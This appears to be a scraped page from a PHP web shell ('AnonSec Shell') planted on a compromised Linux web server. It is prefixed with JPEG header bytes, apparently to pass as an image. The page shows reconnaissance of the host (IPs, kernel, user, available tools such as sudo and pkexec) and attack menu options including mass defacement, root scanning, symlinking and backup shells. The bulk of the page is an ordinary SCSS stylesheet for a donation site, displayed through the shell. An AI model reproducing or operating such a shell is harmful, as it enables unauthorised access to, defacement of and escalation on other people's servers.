JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 172.67.142.142  /  Your IP : 104.23.243.117   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/karina/prd/assets/scss/var/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/karina/prd/assets/scss/var/_card.scss
.card-1 {
    text-align: center;
    font-size: 16px;
    .icon {
        width: 80px;
    }
    h3 {
        font-size: 24px;
        margin-bottom: 20px;
    }
    .desc {
        margin-bottom: 20px;
    }
}

.card-2 {
    background-color: #fff;
    padding: 10px;
    display: block;
    border-radius: 8px;
    margin-bottom: 20px;
    @include transition(0.3s);
    .text {
        padding: 15px;
        .date {
            font-size: 14px;
            color: #865B22;
        }
        h3 {
            color: #142F37;
            font-size: 20px;
            margin: 10px 0;
            @include transition(0.3s);
        }
        .desc {
            font-size: 14px;
            color:#6A7B81 ;
            height: 105px;
            overflow: hidden;
        }
        .btn-more {
            margin-top: 10px;
            color: #EF4135;
            display: inline-block;
        }
    }
    .box_img {
        border-radius: 8px;
        overflow: hidden;
        .img_con {
            @include transition(0.3s);
        }
    }
    &:hover {
        h3 {
            color: #EF4135;
        }
        .box_img {
            .img_con {
                @include scale(1.1);
            }
        }
    }
}
.card-newsletter {
    background-color:rgba($color: #fff, $alpha: 0.9);
    padding: 20px;
    border-radius: 8px;
    margin-bottom: 10px;
    .box_img {
        width: 80px;
        .img_con {
            border-radius: 8px;
            overflow: hidden;
        }
    }
    .col-1 {
        text-align: center;
    }
    .icon {
        width: 45px;
        display: inline-block;
    }
    h3 {
        font-size:16px;
    }
    .info {
        font-size: 13px;
        color:#6A7B81;
    }
    a {
        @include transition(0.3s);
        :hover {
            opacity: 0.8;;
        }
    }
}

.card_donasi {
    position: relative;
    margin: 20px 0;
    border-radius: 12px;
    overflow: hidden;
    .text {
        position: absolute;
        bottom: 0;
        width: 100%;
        left: 0;
        text-align: left;
        color: #fff;
        z-index: 2;
        .container {
            margin-bottom: 160px;
        }
        h2 {
            font-size:40px ;
            font-weight: bold;
        }
        .desc {
            color: #ADB1B2;
            font-size: 16px;
            margin: 10px 0 30px;
        }
        .sub {
            color: #DDC867;
            font-size: 18px;
            margin-bottom: 10px;
        }
        h1 {
            font-weight: normal;
            b,
            strong {
                color: #DDC867;
                font-weight: normal;
            }
        }
    }
    &.card_donasi_2 {
        .text {
            padding: 30px;
            .container {
                margin-bottom: 20px;
            }
            h2 {
                font-size: 32px;
            }
            .desc {
                font-size: 14px;
            }
        }
        &:nth-child(4),
        &:nth-child(5) {
            width: calc(50% - 20px);
            display: inline-block;
            &.ratio2_1:before {
                padding-top: 100%;
            }
            .desc {
                display: none;
            }
            h2 {
                margin-bottom: 20px;
            }
            .col-6 {
                -webkit-box-flex: 0;
                -ms-flex: 0 0 100%;
                flex: 0 0 100%;
                max-width: 100%;
            }
        }
        &:nth-child(4) {
            margin-right: 20px;
        }
        &:nth-child(5) {
            margin-left: 20px;
        }
    }
}
.card-donasi-2 {
    position: relative;
    display: inline-block;
    overflow: hidden;
    border-radius: 8px;
    margin: 10px;
    width: calc(100% - 20px);
    .text {
        position: absolute;
        width: 100%;
        bottom: 0;
        left: 0;
        padding: 20px;
        color: #fff;
        background-image: linear-gradient(to top, rgba(0,0,0,0.6), rgba(0,0,0,0));
        padding-top: 70px;
        h3{
            margin-bottom: 10px;
        }
    }
}

.box-donasi-orange {
    background-color:#EF4135;
    background-image: url('../img/bg-orange.jpg');
    background-repeat: no-repeat;
    background-size: cover;
    color: #fff;
    font-size: 16px;
    padding: 20px 30px;
    border-radius: 12px;
    border: 2px solid #fff;
    overflow: hidden;
    .icon {
        width: 80px;
        margin-bottom: 40px;
    }
    h2 {
        font-size: 24px;
    }
    .desc {
        font-size: 16px;
        margin: 10px 0 20px;
    }
}
.card-step-donasi {
    .number {
        font-size: 18px;
        color: #EF4135;
    }
    .title {
        color: #142F37;
        font-size: 18px;
        margin: 10px 0 10px;
    }
    .desc {
        font-size: 14px;
        color: #6A7B81;
    }
}
.card-mari-donasi {
    padding: 20px;
    background-color: #000;
    color: #fff;
    background-image:url('../img/bg-donasi.png');
    background-repeat: no-repeat;
    background-size: cover;
    background-position: center bottom;
    border-radius: 10px;
    overflow: hidden;
    margin:20px 0;
    .btn {
        margin-top: 20px;
    }
}
.card-fitur {
    margin: 120px 0;
    .icon {
        height: 88px;
    }
    h3 {
        margin: 10px 0 20px;
        font-size: 24px;
        font-weight: 400;
    }
    .desc {
        color: #6A7B81;
        font-size: 18px;
        line-height: 150%;
    }
    .box_img {
        width: 100%;
        border-radius: 12px;
        overflow: hidden;
    }
    .img-fitur {
        &:before {
            content: "";
            position: absolute;
            z-index: 0;
            height: 20px;
            -webkit-border-top-left-radius: 10px;
            -webkit-border-top-right-radius: 10px;
            -moz-border-radius-topleft: 10px;
            -moz-border-radius-topright: 10px;
            border-top-left-radius: 10px;
            border-top-right-radius: 10px;
            background-color: #CAA231;
            top: -20px;
            display: block;
            width: 80%;
            left: 10%;
        }
        img {
            width: 100%;
            border-radius: 12px;
        }
    }
    .detail-text {
        padding: 0 30px;
    }
    &.card-fitur-rl {
        
    }
}
.about-fitur {
   .card-fitur {
        &:nth-child(odd) {
            .col-sm-7 {
                order: 2;
            }
            .col-sm-5 {
                order: 1;
            }
        }
   } 
}

.card-donasi-profile {
    background-color:rgba($color: #fff, $alpha: 0.9);
    padding: 10px;
    border-radius: 8px;
    margin: 0;
    margin-bottom: 10px;
    border: 1px solid #f2f2f2;
    .box_img {
        width: 60px;
        .img_con {
            border-radius: 8px;
            overflow: hidden;
        }
    }
    .col-1 {
        text-align: center;
    }
    .icon {
        width: 30px;
        display: inline-block;
    }
    h3 {
        font-size:16px;
        padding-bottom: 5px;
    }
    .info {
        font-size: 13px;
        color:#6A7B81;
    }
    a {
        @include transition(0.3s);
        :hover {
            opacity: 0.8;;
        }
    }
}
.title-section {
    strong, b {
        color: #CAA231;
        font-weight: normal;
    }
}
.card-struktur {
    background-color: #fff;
    padding: 10px;
    border-radius: 8px;
    margin: 10px;
    .box_img {
        width: 100px;
        margin-left: 15px;
    }
    .name {
        font-size: 16px;
        padding-bottom: 5px;
    }
    .pos {
        font-size: 12px;
        color: #865B22;
    }
}
#slide-struktur {
    .nav-slide {
        position: relative;
        transform:none;
        width:100%;
        left: 0;
        .arrow-left {
            position: absolute;
            transform: translate(-550px,-220px);
        }
        .arrow-right {
            position: absolute;
            transform: translate(520px,-220px);
        }
    }
}

Anon7 - 2022
AnonSec Team